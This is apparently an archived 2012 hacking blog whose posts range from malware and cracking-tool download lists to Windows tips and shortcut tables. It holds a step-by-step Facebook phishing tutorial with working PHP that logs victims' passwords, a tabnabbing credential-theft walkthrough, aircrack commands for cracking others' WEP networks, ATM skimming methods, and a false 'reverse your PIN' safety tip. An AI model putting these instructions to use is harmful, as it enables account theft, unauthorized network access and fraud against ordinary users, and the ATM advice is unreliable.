Wednesday, November 28, 2012

Hackers Beware Free Hacking e-Book | The ultimate Guide to the Internet Security














As per various hacking books are available to hacking but here is the best book for the hackers that to be free downloadable.
Hackers Beware starts with a road map of the various areas of hacking but quickly delves into the details of how specific attacks work and how to protect against them. Since most attacks we hear about either occur or are perceived to come from hackers, people are very interested "in how they do that" - the techniques hackers use to break into systems. Hackers Bewareis unique in that it gives specific exploits, exactly how they work and how to protect against them. This book will help readers understand what security threats they are up against and what they need to do to protect against them. Some books cover this from a high level but do not get into the details of specific exploits and cover it in a case by case fashion. This book will cover the complete picture. It will not only describe how an exploit works but present the signature of the attack, what to look for on a network and how to protect against it.So here i am giving the free downloadable link to the HACKERS BEWARE the HACKING E-BOOK to you guys.






Computer Viruses For Dummies Hacking E-Book Free Download



book in computer field. Using this book you can create your own virus. This book will teach you about the virus programming.

For the Beginner level this book help you to make clear of the doubts in viruses in computer world. You can enjoy by reading this book. you can download this book.

Sunday, November 25, 2012

Download Free All Softwares Needed For Hacking And Cracking














- Anon FTP
- Arpinject
- Aspack21
- Atk-2.1
- Bios Pas Remover
- BlasterW32
- Blue
- BMP Ripper
- Brutus
- CASXM138
- CAYZODQF
- CGI Founder v1.043
- CGI Sscan
- Cia10
- Cragle
- Crack Zip
- Davs TR Retail
- Deep Un Freeze
- Dr VBS
- EES Binder
- FTP BR
- Genexe
- Grinder 1.1
- Hack Flash Tempelate
- Hack My Space
- Hack Photoshop CS2
- Hackers Assistant
- Hack the game
- H C K
- HL Boom
- Hotmail Scam Page
- Hydra
- John
- Key Logger
- Legion NetmBios Scanner
- Mail Bomb_2.0 YAHOO
- MIDNITE massacren
- NFO Maker
- Nimda
- Nkedb
- NT Packer
- NTS
- Null Ass Frontend
- P0kes WormGen
- Panther
- Pkp BB pass extractor
- phpBBAttacker
- Pqwak2
- Proxy Pro
- Rainbow crack
- Res Hacker
- Rocket
- RPC
- Rpc scan
- Sasser
- Send Mailer
- Show Pass
- Site Digger
- Smbat- win32bin
- SMB Die
- SMB Proxy
- Sprut
- Stealth- HTTP Scanner
- Super
- TFTPD32
- T Hunter
- Tina soft KILL
- UPD Flood
- Ultra Dos
- Visa Spam
- X Pass
- Yahoo Password
- Zehir
- Addr View
- AOL View
- App To Service
- Astaroth Joiner
- Bank Of America
- Cable Modem Sniffer
- Cap Keys DIGITAL
- C Ports
- C C Generator
- DDL Sites
- eBay
- E Gold.
- E-mail Cracker
- Database Defacer
- F.B.I. Binder
- FTP Brute Forcer
- Fuck Mail Bomber
- PhpBB_exploit_pack
- Google Hacker
- Hook Tool Box
- Hotmail Email Hacker
- Hotmail Hack
- HSBC-US
- Iecv
- IP2
- Ip Net Info
- Key Chenger
- Moore R. Port Scanner
- Msn Flooder
- Msn Account Cracker
- Msn Loader
- NET BIOS Scaner
- Net bios name scanner
- Net Res View
- NO limit cracker
- On-Off MSN
- OS Update Hack
- Pay Pal
- PC Any Pass
- Php Nuke Hacker
- phpBB Annihilator
- phpbb bruteforcer.
- phpBB_DoS
- phpBB_spammer
- phpBBAttacker
- phpBBcracker
- php Bug Scan
- PHP Fucker
- PhpNuke_ bypass
- Ping & Nukes
- Port Listener
- procexp
- Pro Mo
- phpBB Email harvester
- Remote Shut Down
- Server 2003 Keygen
- Server Killer
- Source Checker
- Source codes
- SQL Scan
- Super Scan
- Traceroute
- UC.Forum Spam
- USBank
- Win XP Activator
- Win XP Corperate Keygen
- Who is td
- Warez Sites
- Win Admin pass Hack
- Yahoo Ultra Cracker
- Web Cracker
- Win Xp Key Changer
- Win XP Key Viewer
- XP lizer
- Window Hide
- www Hack
- Win XP KeyGen.


Facebook Phishing Tutorial











Hi every one this post is updated now. The previous one is not clearly explained so i updated with this with the clear method so you can learn the basic of hacking and how this works. Hacking the facebook account password is not that much tough. I will tell you how you can hack but learn this only for educational purpose...







What is Phishing?
Phishing is the technique to get the victims password without Victims knowledge by showing the duplicate log in page.This is the method which used by most of the peoples in earlier time and even now. Actually the process is getting the victims password using the Fake Login page called phisher.

Phishing Process:
Actually hacker need to create the fake login page to get the password of victim. In the Normal Webpage which having the login form. will look like this.




The Duplicate or fake page also look like this only . yea that is the thing we have to make a same page. You can ask what the changes we need to do? Actually we work with the HTML part only the backside of webpage.

If you know the Small knowledge of the HTML means this will be easy one. Any how don't worry i will guide you to make a fake login page of facebook.

Making the Phishing Or Fake page:
Finally we are going to Attack.Here are the simple steps will guide you to make fake page just follow the steps.

Just Go here https://www.facebook.com/login.php and right click on anywhere in the webpage and select View Page Source.
Copy all the codes in the page and paste it on note pad or Note pad ++(recommended) and save it like "Index.Html".
Copy the below Php code and paste it on another note pad. and name it "Fb.php".

<?php
header(”Location: http://www.Facebook.com/login.php “);
$handle = fopen(”pass.txt”, “a”);
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, “=”);
fwrite($handle, $value);
fwrite($handle, “\r\n”);
}
fwrite($handle, “\r\n”);
fclose($handle);
exit;
?>

And Create a empty new note pad and save it "pass.txt".
Now you having the Three files

Index.html
Fb.php
Pass.txt
Now we are at the working part, Right click on the Index.html file and open it using note pad or note pad ++. Now press The CTRL + F to perform the search operation. Search the Keyword called action=' also you see "method=post" change it into "method=get".
The keyword followed by the URL look like this.

action="www.facebook.com/login.php"

Now you need to change the URL of existing one. Just replace the existing URL with "fb.php" Which we created earlier.This will look like this after the changes.

action="fb.php"
Thats it you are done half of the part. Now you need any free web hosting accounts to upload these files I refer my3gp.com,110mb or any free hosting account which you trusted and also not banned for a long time. if you prefer the paid hosting means that is more than good.
Sign up into my3gb.com and Select the file manger and upload these three files to same directory else this won't work.
Copy the Html file link(Index.html) which uploaded and send it to you friends and tell to sign in and see the magic ( Actually you need to show some social engineering there).
then check the empty text file to get the password.
That's it you are done.

Saturday, November 3, 2012

Hack a wi-fi network














1) First we need to scan for available wireless networks.
Theres this great tool for windows to do this.. called “NetStumbler” or Kismet for Windows and Linux and KisMac for Mac


It’ll also show how the Wi-fi network is secured..
The two most common encryption types are:
1. WEP

2. WAP
WEP i.e Wire Equivalent Privacy is not consideres as safe as WAP i.e Wireless Application Protocol.
WEP have many flaws that allows a hacker to crack a WEP key easily.. whereas

WAP is currently the most secure and best option to secure a wi-fi network..
It can’t be easily cracked as WEP because the only way to retreive a WAP key is to use a brute-force attack or dictionary atack.

Here I’ll tell you how to Crack WEP
To crack WEP we will be using Live Linux distribution called BackTrack to crack WEP.
BackTrack have lots of preinstalled softwares for this very purpose..
The tools we will be using on Backtrack are:
Kismet – a wireless network detector
airodump – captures packets from a wireless router
aireplay – forges ARP requests
aircrack – decrypts the WEP keys

1. First of all we have to find a wireless access point along with its bssid, essid and channel number. To do this we will run kismet by opening up the terminal and typing in kismet. It may ask you for the appropriate adapter which in my case is ath0. You can see your device’s name by typing in the command iwconfig.

2. To be able to do some of the later things, your wireless adapter must be put into monitor mode. Kismet automatically does this and as long as you keep it open, your wireless adapter will stay in monitor mode.


3. In kismet you will see the flags Y/N/0. Each one stands for a different type of encryption. In our case we will be looking for access points with the WEP encryption. Y=WEP N=OPEN 0=OTHER(usually WAP).


4. Once you find an access point, open a text document and paste in the networks broadcast name (essid), its mac address (bssid) and its channel number. To get the above information, use the arrow keys to select an access point and hit <ENTER> to get more information about it.

5. The next step is to start collecting data from the access point with airodump. Open up a new terminal and start airodump by typing in the command:
airodump-ng -c [channel#] -w [filename] –bssid [bssid] [device]
In the above command airodump-ng starts the program, the channel of your access point goes after -c , the file you wish to output the data goes after -w , and the MAC address of the access point goes after –bssid. The command ends with the device name. Make sure to leave out the brackets.

6. Leave the above running and open another terminal. Next we will generate some fake packets to the target access point so that the speed of the data output will increase. Put in the following command:
aireplay-ng -1 0 -a [bssid] -h 00:11:22:33:44:55:66 -e [essid] [device]
In the above command we are using the airplay-ng program. The -1 tells the program the specific attack we wish to use which in this case is fake authentication with the access point. The 0 cites the delay between attacks, -a is the MAC address of the target access point, -h is your wireless adapters MAC address, -e is the name (essid) of the target access point, and the command ends with the your wireless adapters device name.

7. Now, we will force the target access point to send out a huge amount of packets that we will be able to take advantage of by using them to attempt to crack the WEP key. Once the following command is executed, check your airodump-ng terminal and you should see the ARP packet count to start to increase. The command is:
aireplay-ng -3 -b [bssid] -h 00:11:22:33:44:5:66 [device]
In this command, the -3 tells the program the specific type of attack which in this case is packet injection, -b is the MAC address of the target access point, -h is your wireless adapters MAC address, and the wireless adapter device name goes at the end.

8. Once you have collected around 50k-500k packets, you may begin the attempt to break the WEP key. The command to begin the cracking process is:
aircrack-ng -a 1 -b [bssid] -n 128 [filename].ivs
In this command the -a 1 forces the program into the WEP attack mode, the -b is the targets MAC address, and the -n 128 tells the program the WEP key length. If you don’t know the -n , then leave it out. This should crack the WEP key within seconds. The more packets you capture, the bigger chance you have of cracking the WEP key.


Top 3 Ways to Hack ATM | Protection Against ATM Hacking


















ATM hacking is from past is the first interest of every computer hacker.And in this article i will talk about ATM Hacking, things like how ATM Works , What are the vulnerabilities available to exploit and last but not least YES, how to patch them. So starting from the first how ATM works.

Warning:- Hacking ATM is highly illegal. Can Put you into cell for minimum 3 years along with fine 7 lac.This article is just for education purpose only do respect the law in your country, the author of the tutorial do not held any responsibility of the act or trails performed by you after reading the article.

How ATM Works
An ATM is simply a data terminal with two input and four output devices. Like any other data terminal, the ATM has to connect to, and communicate through, a host processor. The host processor is analogous to an nternet Service Provider (ISP) in that it is the gateway through which all the various ATM networks become available to the cardholder (the person wanting the cash).

Most host processors can support either leased-line or dial-up machines. Leased-line machines connect directly to the host processor through a four-wire, point-to-point, dedicated telephone line. Dial-up ATMs connect to the host processor through a normal phone line using a modem and a toll-free number, or through an Internet service provider using a local access number dialed by modem.
Leased-line ATMs are preferred for very high-volume locations because of their thru-put capability, and dial-up ATMs are preferred for retail merchant locations where cost is a greater factor than thru-put. The initial cost for a dial-up machine is less than half that for a leased-line machine. The monthly operating costs for dial-up are only a fraction of the costs for leased-line.
The host processor may be owned by a bank or financial institution, or it may be owned by an independent service provider. Bank-owned processors normally support only bank-owned machines, whereas the independent processors support merchant-owned machines.



Warning:- Hacking ATM is highly illegal. Can Put you into cell for minimum 3 years along with fine 7 lac.This article is just for education purpose only do respect the law in your country, the author of the tutorial do not held any responsibility of the act or trails performed by you after reading the article.
Methods of Hacking ATM



1. Magnetic Reader
Most ATM hackers have a device called Magnetic Reader which they attach over the card slot on the ATM, and as any one pin the card inside automatically it reads the magnetic information. And with the advancement of time the with the help of wireless technology, the magnetic reader automatically transmitted the details to fraudsters in a nearby location.

2. Hidden Camera
Obviously this is one of the easy method to hack an ATM machine but this is something more than hack, here we are not penetrating the ATM. As we all know our ATM is protected by a PIN which acts as our password so if some one have to get money after stealing our card he/she should have the PIN code too, these days criminals have a solution for this too.

3. They enter into the ATM when guard is outside put hand on the ATM cam and silently in 5 or 6 seconds, just install a hidden camera near by the keypad of the ATM from the user enter his/her PIN CODE, and again using the latest technology (wireless) and the PIN is digitally recorded and now hacker have the choice whether he want to get the details remotly or he/she will go to ATM and get the details by himself/herself.

Protection Against ATM Hacking
1. Do Hide the keypad when you enter your PIN CODE.

2. See All around if found any camera which you think not supposed to be there do inform the ATM guard and the near by Bank.

3. DO confirm completeness of the transaction after getting the money most people get trapped into this as the said above in second method.

4. If any criminal caught to and say to extract money from ATM, to save your money just reverse your PIN Account number. Like if my PIN CODE is 1234, if some one having PIN Code like 7777 then just put a 0 (Zero) in the last digit, money will stuck half in the ATM and half outside.
Hope you like the article :)

Warning:- This article is just for education purpose only do respect the law in your country, the author of the tutorial do not held any responsibility of the act or trails performed by you after reading the article.

Wednesday, October 31, 2012

Editing a Photo Using Windows 7 Paint







Thanks to the popularity of social media and sharing sites like Facebook, Twitter, and Instagram, photo editing has become a national obsession. Luckily, you don’t have to spend a fortune on expensive photography software to express your creativity. There are a number of free, easy-to-use ways to edit your pictures. And one of these may already be at your fingertips if you’re using Windows 7.

Windows 7 improved drawing utility – Paint – is a great way to edit your pictures, improve their quality, and add fun effects like colors or text. For those who are new at manipulating their photos, Paint is a great way to learn the ropes.

Begin by clicking on Start from your Windows menu, then select All Programs, followed by Accessories and then Paint. This will get you into the Paint program. In order to find a picture to edit, click on the application icon, and then select Open. (The application icon is the small picture of a document located in the top left corner.)

A window will open up, allowing you to choose a picture file. Simply click on Pictures, and then open the folder that contains the picture you’re looking for. Once you choose a picture, click Open.

Your selected picture will then appear in the open Paint window. From here, you can explore some of the editing tools available. For example, you can add colors from the color palette. Just click on a colored square from the selection on the Home tab. Then choose a tool. Brushes allow you to paint the color on like an artist, while the dropper dabs color in small drops. You can also draw shapes or objects and then use the Fill tool to fill them with color. To add a shape, click on the Shapes button and select a shape. Then click and drag anywhere on your image to draw a rectangle, ellipse, circle, etc.

You can also customize the color palette to get exactly the shade you want. Click on the Edit Colors button. This opens up an area where you can add various colors to get a shade that’s completely unique. Once you’re happy with the look, Click on Add to Custom Colors, followed by Ok to save your new color.

To add a name, phrase, or other text to your picture, click on the Text button. You can then drag the image around to create a text box where you can type. You can also edit this text in the same way you would a Word document – changing the color, size, and font.

Finally, you can modify your photo with the buttons found under the Image section. Here you can re-size your picture, flip it around to create a mirror of itself, stretch your photo out, and more. Once you’re happy with the look, click the Save button to save the changes to your picture. You can also print or email yourself the image.

4 Privacy Tips for Facebook





Computer users have long had a love hate relationship with the internet’s most popular social networking site. There’s nothing like Facebook for staying in touch with friends and family. And yet, many people also struggle with the idea of maintaining their privacy while posting pictures, status updates and other personal information.


Luckily, there are ways you can exercise a degree of control over what people can and can’t access from your Facebook page. Here’s a look at 4 easy tips and tricks for keeping on top of the ever-changing privacy rules of Facebook while still staying social:


1. Determine what your current privacy settings are

To access your Facebook page’s privacy settings, log in to your account. In the top right corner of your home page (or time line) you’ll notice a pull-down menu next to the Home button. Clicking on the Account Settings and Privacy tabs from this menu will give you an overview of your current privacy landscape, and allow you to modify your settings.


2. Control your default privacy settings

Within the Privacy tab, you’ll notice a setting for your default privacy. This is the deciding factor in who is allowed to post to your timeline and who is and isn’t allowed to see your photos and status updates. The Public setting should generally be avoided, as it’s the equivalent of broadcasting your personal information across the web. The Friends setting is usually a much better option, since you have control over who you add to your friends list.


On the Custom setting, you can exclude certain people from being able to comment, or you can create a specified list of people who can access your information.


3. Decide how people can find and contact you

The next section on the Privacy page allows you to control how people connect with you on Facebook. Under the heading How You Connect, you can decide who can look you up by email, who can send you a message, and who is allowed to send you a friend request. You can select from anyone, just those on your friends list, or friends of your friends.


4. Adjust your tagging settings

An often overlooked area of privacy on Facebook falls under the heading of Timeline and Tagging. This is where you can control what happens when your friends tag you or your content, as well as when someone posts on your timeline.


First, you need to decide, from the pull down menu, who is allowed to post on your timeline. (This is also where you can choose to not have anyone post on your timeline at all.) Next, select who can see what others post on your timeline. If you want to be able to review posts that friends tag you in or tags that friends add to your own posts, simply switch the controls for these things from Off to On.

Facebook chat some coolest codes




1. Large Pink Double ( triple ) heart code



[[379320338758329]] [[379320355424994]] [[379320348758328]] [[379320352091661]] [[379320345424995]] [[379320455424984]]
[[379320448758318]] [[379320452091651]] [[379320445424985]] [[379320442091652]] [[379320525424977]] [[379320518758311]]
[[379320512091645]] [[379320522091644]] [[379320515424978]] [[379320602091636]] [[379320612091635]] [[379320605424969]]
[[379320598758303]] [[379320608758302]] [[379320702091626]] [[379320705424959]] [[379320692091627]] [[379320695424960]]
[[379320698758293]] [[379320778758285]] [[379320775424952]] [[379320788758284]] [[379320785424951]] [[379320782091618]]
[[379320872091609]] [[379320875424942]] [[379320865424943]] [[379320862091610]] [[379320868758276]] [[379320945424935]]


2. Mr. Bean



[[255016264574238]] [[255016271240904]] [[255016277907570]]
[[255016267907571]] [[255016274574237]] [[255016384574226]]
[[255016387907559]] [[255016394574225]] [[255016401240891]]
[[255016391240892]] [[255016464574218]] [[255016454574219]]
[[255016457907552]] [[255016461240885]] [[255016451240886]]
[[255016537907544]] [[255016531240878]] [[255016534574211]]
[[255016541240877]] [[255016527907545]] [[255016634574201]]



3. Jack Sparrow



[[298356520217565]] [[298356516884232]] [[298356506884233]] [[298356510217566]]
[[298356513550899]] [[298356620217555]] [[298356606884223]] [[298356616884222]]
[[298356610217556]] [[298356613550889]] [[298356673550883]] [[298356676884216]]
[[298356666884217]] [[298356680217549]] [[298356670217550]] [[298356740217543]]
[[298356733550877]] [[298356743550876]] [[298356730217544]] [[298356736884210]]
[[298356823550868]] [[298356810217536]] [[298356820217535]] [[298356826884201]]
[[298356813550869]] [[298356906884193]] [[298356896884194]] [[298356900217527]]
[[298356903550860]] [[298356893550861]] [[298356950217522]] [[298356946884189]]

4. Superman



[[299528860107644]] [[299528863440977]] [[299528866774310]] [[299528856774311]]
[[299528870107643]] [[299528950107635]] [[299528943440969]] [[299528946774302]]
[[299528953440968]] [[299528956774301]] [[299529013440962]] [[299529016774295]]
[[299529010107629]] [[299529003440963]] [[299529006774296]] [[299529060107624]]
[[299529063440957]] [[299529066774290]] [[299529070107623]] [[299529073440956]]
[[299529173440946]] [[299529183440945]] [[299529180107612]] [[299529176774279]]
[[299529186774278]] [[299529243440939]] [[299529236774273]] [[299529240107606]]

5. Elmo



[[302117289844540]] [[302117283177874]] [[302117276511208]] [[302117279844541]] [[302117286511207]] [[302117366511199]]
[[302117369844532]] [[302117373177865]] [[302117383177864]] [[302117379844531]] [[302117426511193]] [[302117436511192]]
[[302117429844526]] [[302117423177860]] [[302117433177859]] [[302117523177850]] [[302117529844516]] [[302117526511183]]
[[302117536511182]] [[302117533177849]] [[302117606511175]] [[302117596511176]] [[302117599844509]] [[302117593177843]]
[[302117603177842]] [[302117646511171]] [[302117649844504]] [[302117659844503]] [[302117656511170]] [[302117653177837]]
[[302117706511165]] [[302117703177832]] [[302117699844499]] [[302117709844498]] [[302117696511166]] [[302117749844494]]

6. Troll face



[[242538225822042]] [[242538222488709]] [[242538232488708]] [[242538219155376]] [[242538229155375]] [[242538339155364]]
[[242538335822031]] [[242538342488697]] [[242538345822030]] [[242538349155363]] [[242538392488692]] [[242538395822025]]
[[242538399155358]] [[242538402488691]] [[242538405822024]] [[242538475822017]] [[242538472488684]] [[242538489155349]]
[[242538492488682]] [[242538485822016]] [[242538562488675]] [[242538565822008]] [[242538569155341]] [[242538575822007]]
[[242538572488674]] [[242538612488670]] [[242538625822002]] [[242538619155336]] [[242538622488669]] [[242538615822003]]
[[242538675821997]] [[242538682488663]] [[242538672488664]] [[242538679155330]] [[242538685821996]] [[242538742488657]]


7.Mask



[[255006724575192]] [[25500672
7908525]] [[255006737908524]] [[255006734575191]] [[255006731241858]]
[[255006827908515]] [[255006831241848]] [[255006824575182]] [[255006817908516]] [[255006821241849]]
[[255006874575177]] [[255006871241844]] [[255006884575176]] [[255006877908510]] [[255006881241843]]
[[255006934575171]] [[255006931241838]] [[255006941241837]] [[255006944575170]] [[255006937908504]]
[[255007004575164]] [[255007001241831]] [[255006994575165]] [[255006997908498]] [[255006991241832]]
[[255007084575156]] [[255007101241821]] [[255007077908490]] [[255007091241822]] [[255007081241823]]


Friday, October 26, 2012

3 Simple Ways To Speed Up Your Windows Computer




1. Speeding up your Windows PC startup time


You can optimize your computer’s startup speed by launching Run on your Windows computer and typing “msconfig” without the quotes. This will take you to the System Configuration Settings which has five tabs – General, Boot, Services, Startup, and Tools.

Under the General tab, you’ll find 3 startup selections: normal, diagnostic, and selective. During normal startup, all device drivers and services will be loaded by your computer. If this is ticked, it may be the reason why your computer is taking long. Choose either diagnostic or selective startup to speed up the starting time of your Windows computer. Diagnostic startup only loads basic devices and services whereas with selective startup, you can choose to load neither system services nor startup items. After making a selection select “Apply.”

Under the Boot tab, select Advanced options so you can choose the number of processors to facilitate boot speed. If you have a dual-core or quad-core processor, assigning more than one of them to help with the start-up process can significantly boost your computer’s speed. Unfortunately, this optimization tweak is not so efficient on power so if you’re using a laptop, expect some battery drain after startup.

Finally, there’s the Services and Startup tab where you can specifically choose which services and startup items are going to load.


2. Speeding up your Windows Start Menu


The Start Menu is another serious offender as it often takes time to load. Once again you need to open Run but this time, you will type “regedit.exe” to launch the Registry Editor. Go to the HKEY_CURRENT_USER folder and find Control Panel –> Desktop –> MenuShowDelay. Then, double click MenuShowDelay to edit its value. Type in the numbers on the blank and hit “OK.” Remember, the lower the value the faster the Start Menu will load.

Another trick for speeding up your Windows Start Menu would be to limit the number of shortcuts on your desktop. It could be that you just have too many icons on your desktop and that’s what is causing your computer to take long when loading the Start Menu.


3. Speeding up the Right Click Menu


Yet another disappointing slow-down that Windows users experience is the time it takes the Menu to show up when hitting the right click. Installing third-party programs that allow you to remove items from the context menu should speed it up.

Tuesday, July 10, 2012

How To Hack Facebook Accounts By Tabnabbing




Tab-nabbing is an advanced Phishing technique .it requires a lot of coding to be done ,But i have tried to keep it as simple as possible hope you like the following tutorial



Requirements  :

1. You should know how Phishing , Tabnabbing works if not read the following articles
Tabnabbing – A New Type of Phishing Attack.

2. A Free Web Hosting Account - You can use110mb.com or ripway.com


3. You should have the following files which are required for tabnabbing
Facebook.html -Fake Facebook login page (phisher)
login.php – Script which captures the login details of the victim
google.html – Standard google page used to trick the user
tabnabb.js – Java script which is required for tabnabbing.


Download Now 


Password



Procedure :


1. First a fall download all the files and extract them using winrar or win-zip , Then upload facebook.html ,login.php & google.html to your free web webhosting account



2. Now open tabnabb.js using a notepad , Search for “Enter your URL here” , Now replace it with your “Facebook.html” url which you uploaded in the previous step, finally save it and upload tabnabb.js to your hosting account

3. By now you should have successfully uploaded all the four files to your hosting account as shown

4. Now to check whether the hack is working, click on the google.html link and open it , Now open few new tabs , After some time you will see google page switched to your fake Facebook page

5. Now once the victim enters all his credentials in our fake facebook login page and clicks login, he will be redirected to Facebook.com/careers page to avoid suspecion

6. To see the victim login details go to your hosting account where you will see a new file “log.txt” Open it to see the victims user-id and password.


Friday, July 6, 2012

Enter XP Without Passwords




There is a way to log 0n to your Windows XP system if ever you've forgotten all your users account passwords and don't have anyadministrator account to enter the system. 

The truth is you don't need to install expensive 3rd party software or don't even need to be an expert to enter your locked XP system. What you just need is your Windows XP installer disc and your locked system to have an optical drive (of course). This is very handy if you forgot your administrator password and don't have any access to other account with administrator rights or if you're friend have also forgot his password. 

Here's what you'll do if ever you forgot all your User Account'spassword and you thought (including Microsoft) that you can no longer enter your System. 

1.Put the Windows XP installer disc into the optical drive (CD/DVD) and restart your PC.

2.Press any key when prompted with "Press any key to boot from CD", then wait for the "Welcome to setup" screen to appear, just press enter.

3.Then press F8 to agree on the license agreement.

4.On the next screen, you will be prompted to repair or install a fresh copy of Windows XP. You just need to select the locked Windows XP installation you want to enter (If you've more than one Windows XP installed) and press "R".

5.The system will then reboot after setup checked the disk and copied setup files (Just wait for the system to reboot). And when it reboots, don't press any key when prompted to "Press any key to boot from CD".

6.The setup will be automatically start the setup process. This is the most important steps, you need to wait for the setup to install the devices. Press the combination of SHIFT+F10 when you see the words "Installing Devices" at the bottom of the shown remaining minutes of the setup to finish.

7.After that, a command console will be open, where in you need to type "NUSRMGR.CPL" (Without the quotes).

8.You will be then given access to the User Account window similar to the control panel where you will delete or edit your forgotten password. Choose remove if you need to enter the system without entering password or edit if you want to change your forgotten password.

9.After you delete or edit your account password, close the command windows and let the setup to finish. (You will also be needing to enter the XP product key if prompted)

10.When setup is finished, system will reboot and you'll be automatically enter your system if you choose to delete the password or need to enter your new password if you just edit your forgotten password.

11.That's all! You now have entered your locked Windows XP system.


Data Encryption With JavaScript



Normally if you submit a form and you don’t use SSL, your data will be sent in plain text.

In short words jCryption is a javascript HTML -Form encryption plugin, which encrypts the POST/GET-Data that will be sent when you submit a form.

jCryption uses the Multiple-precision and Barrett modular reduction libraries for the calculations and jQuery is used for the rest. jCryption is completly free and dual licensed under the MIT and GPL licenses like jQuery.

jCryption was tested with Internet Explorer 6 +, Mozilla Firefox 3+, Safari 3, Opera 9+, Google Chrome.

Features:
* RSA form data encryption up to 2048 bit
* AjaxSubmit supported
* no SSL required
* easy to install, use and extend
* doesn’t block the browser on calculations

Sample:
Just call jCryption on your form: $("#normal").jCryption();
Download jCryption - Here 

Windows Operating System Shortcut Keys


Shortcut Keys
Description
Ctrl + (the '+' key 
on the keypad)
Automatically adjust the width's of all the 
columns in Windows explorer
Ctrl + Backspace
Delete word to the left of cursor
Alt + E
Edit options in current program
Alt + Enter
Opens properties window of Selected icon or program
Alt + Esc
Switch Between open applications on taskbar
Alt + F
File menu options in current program
Alt + F4
Closes Current open program
Alt + Print Screen
Copies active window to the clipboard
Alt + Shift + Tab
Switch backwards between open applications
Alt + Tab
Switch between open applications
Ctrl + A
Select all text
Ctrl + C
Copy highlighted text, data, or image
Ctrl + Del
Delete word to the right of cursor
Ctrl + End
Goes to end of document
Ctrl + Esc
Bring Up start button
Ctrl + F4
Closes Window in Program
Ctrl + Home
Goes to beginning of document
Ctrl + Insert
Copy selected item
Ctrl + Left arrow
Moves one word to the left at a time
Ctrl + Right arrow
Moves one word to the right at a time
Ctrl + V
Paste
Ctrl + X
Cut selected item
Ctrl + Z
Undoes a previous action
End
Goes to end of current line
F1
Accesses online help from most programs
F2
Renames selected Icon
F3
Starts find from desktop
F4
Opens the drive selection when browsing
F5
Refresh Contents
Holding Shift
Boot safe mode or by pass system files
Holding Shift
When putting in an audio CD will prevent CD Player from playing
Home
Goes to beginning of current line
Shift + Del
Cut selected item
Shift + Del
Delete programs/files without throwing into the recycle bin
Shift + End
Highlights from current position to end of line
Shift + F10
Simulates right click on selected item
Shift + Home
Highlights from current position to beginning of line
Shift + Insert
Paste


Microsoft Windows Shortcut Keys
Below is a listing of Windows keys that can be used on computers running a Microsoft Windows operating system and using a keyboard with a Windows key.
Shortcut Keys
Description
Windows Key + D
Minimizes all windows and returns the user to the desktop
Windows Key + E
Open Microsoft Explorer
Windows Key + F
Display the Windows Search / Find feature
Windows Key + CTRL + F
Display the search for computers window
Windows Key + F1
Display the Microsoft Windows help
Windows Key + L
Lock the computer (Windows XP and above only)
Windows Key + M
Minimizes all windows
Windows Key + Pause / Break key
Open the system properties window
Windows Key + R
Open the run window
Windows Key + SHIFT + M
Undo the minimize
Windows Key + Tab
Cycle through open programs through the taskbar
Windows Key+ U
Open Utility Manager

Word Shortcut Keys

Shortcut Keys
Description
Ctrl + A
Select all contents of the page
Ctrl + B
Bold highlighted selection
Ctrl + C
Copy selected text
Ctrl + X
Cut selected text
Ctrl + P
Paste
Ctrl + F
Open find box
Ctrl + I
Italic highlighted selection
Ctrl + K
Insert link
Ctrl + U
Underline highlighted selection
Ctrl + Y
Repeat the last action performed
Ctrl + Z
Undo last action
Ctrl + L
Aligns the line or selected text to the left of the screen
Ctrl + E
Aligns the line or selected text to the center of the screen
Ctrl + R
Aligns the line or selected text to the right of the screen
Ctrl + M
Indent the paragraph
Ctrl + Shift + F
Change the font
Ctrl + Shift + >
Increase selected font +1
Ctrl + ]
Increase selected font +1
Ctrl + Shift + <
Decrease selected font -1
Ctrl + [
Decrease selected font -1
Ctrl + Shift + *
View or hide non printing characters
Ctrl +
Moves one word to the left
Ctrl +
Moves one word to the right
Ctrl +
Moves to the beginning of the line or paragraph
Ctrl +
Moves to the end of the paragraph
Ctrl + Del
Deletes word to right of cursor
Ctrl + Backspace
Deletes word to left of cursor
Ctrl + End
Moves the cursor to the end of the document
Ctrl + Home
Moves the cursor to the beginning of the document
Ctrl + Spacebar
Enable / Disable auto correction
Ctrl + 1
Single-space lines
Ctrl + 2
Double-space lines
Ctrl + 5
1.5-line spacing
Ctrl + Alt + 1
Changes text to heading 1
Ctrl + Alt + 2
Changes text to heading 2
Ctrl + Alt + 3
Changes text to heading 3
F1
Open Help
Shift + F3
Change the case of the selected text
F4
Repeat the last action performed (2000+)
F5
Open goto window
F7
Spell check selected text and or document
Shift + F7
Activate the thesaurus
F12
Save as
Shfit + F12
Save

Excel Shortcut Keys
Shortcut Keys
Description
F7
Spell check selected text and or document
F11
Create chart
Ctrl + Shift + ;
Enter the current time
Ctrl + ;
Enter the current date
Alt + Shift + F1
Insert New Worksheet
Shift + F3
Open the Excel formula window
Shift + F5
Bring up search box
Ctrl + A
Select all contents of the worksheet
Ctrl + B
Bold highlighted selection
Ctrl + I
Italic highlighted selection
Ctrl + K
Insert link
Ctrl + U
Underline highlighted selection
Ctrl + 5
Strikethrough highlighted selection
Ctrl + P
Bring up the print dialog box to begin printing
Ctrl + Z
Undo last action
Ctrl + F9
Minimize current window
Ctrl + F10
Maximize currently selected window
Ctrl + F6
Switch between open workbooks / windows
Ctrl + Tab
Move to next worksheet
Ctrl + Shift + !
Format number in comma format
Ctrl + Shift + $
Format number in currency format
Ctrl + Shift + #
Format number in date format
Ctrl + Shift + %
Format number in percentage format
Ctrl + Shift + ^
Format number in scientific format
Ctrl + Shift + @
Format number in time format
Ctrl + Arrow key
Move to next section of text
Ctrl + Space
Select entire column
Shift + Space
Select entire row
Mouse Shortcuts
Mouse Shortcuts
Description
Double click
Selects word
Triple click
Selects paragraph
Ctrl + Mouse wheel
Zooms in and out of document
Internet Explorer Shortcut Keys
Shortcut Keys
Description
Alt + Left Arrow
Back a page
Alt + Right Arrow
Forward a page
F5
Refresh current page / frame
F11
Display the current website in full screen mode. Pressing F11 again will exit this mode
Esc
Stop page or download from loading
Ctrl + Enter
Quickly complete an address. As an example, type in: Google the address bar and press CTRL + ENTER. Http://www.Google.com will automatically be entered
Ctrl + N
Open New browser window
Ctrl + P
Print current page / frame
FrontPage Shortcut Keys
Shortcut Keys
Description
Ctrl + C
Copy selected text
Ctrl + X
Cut selected text
Ctrl + P
Paste selected text
Ctrl + K
Create a hyperlink
Ctrl + B
Bold highlighted selection
Ctrl + I
Italic highlighted selection
Ctrl + U
Underline highlighted selection
Ctrl + L
Left align the text
Ctrl + R
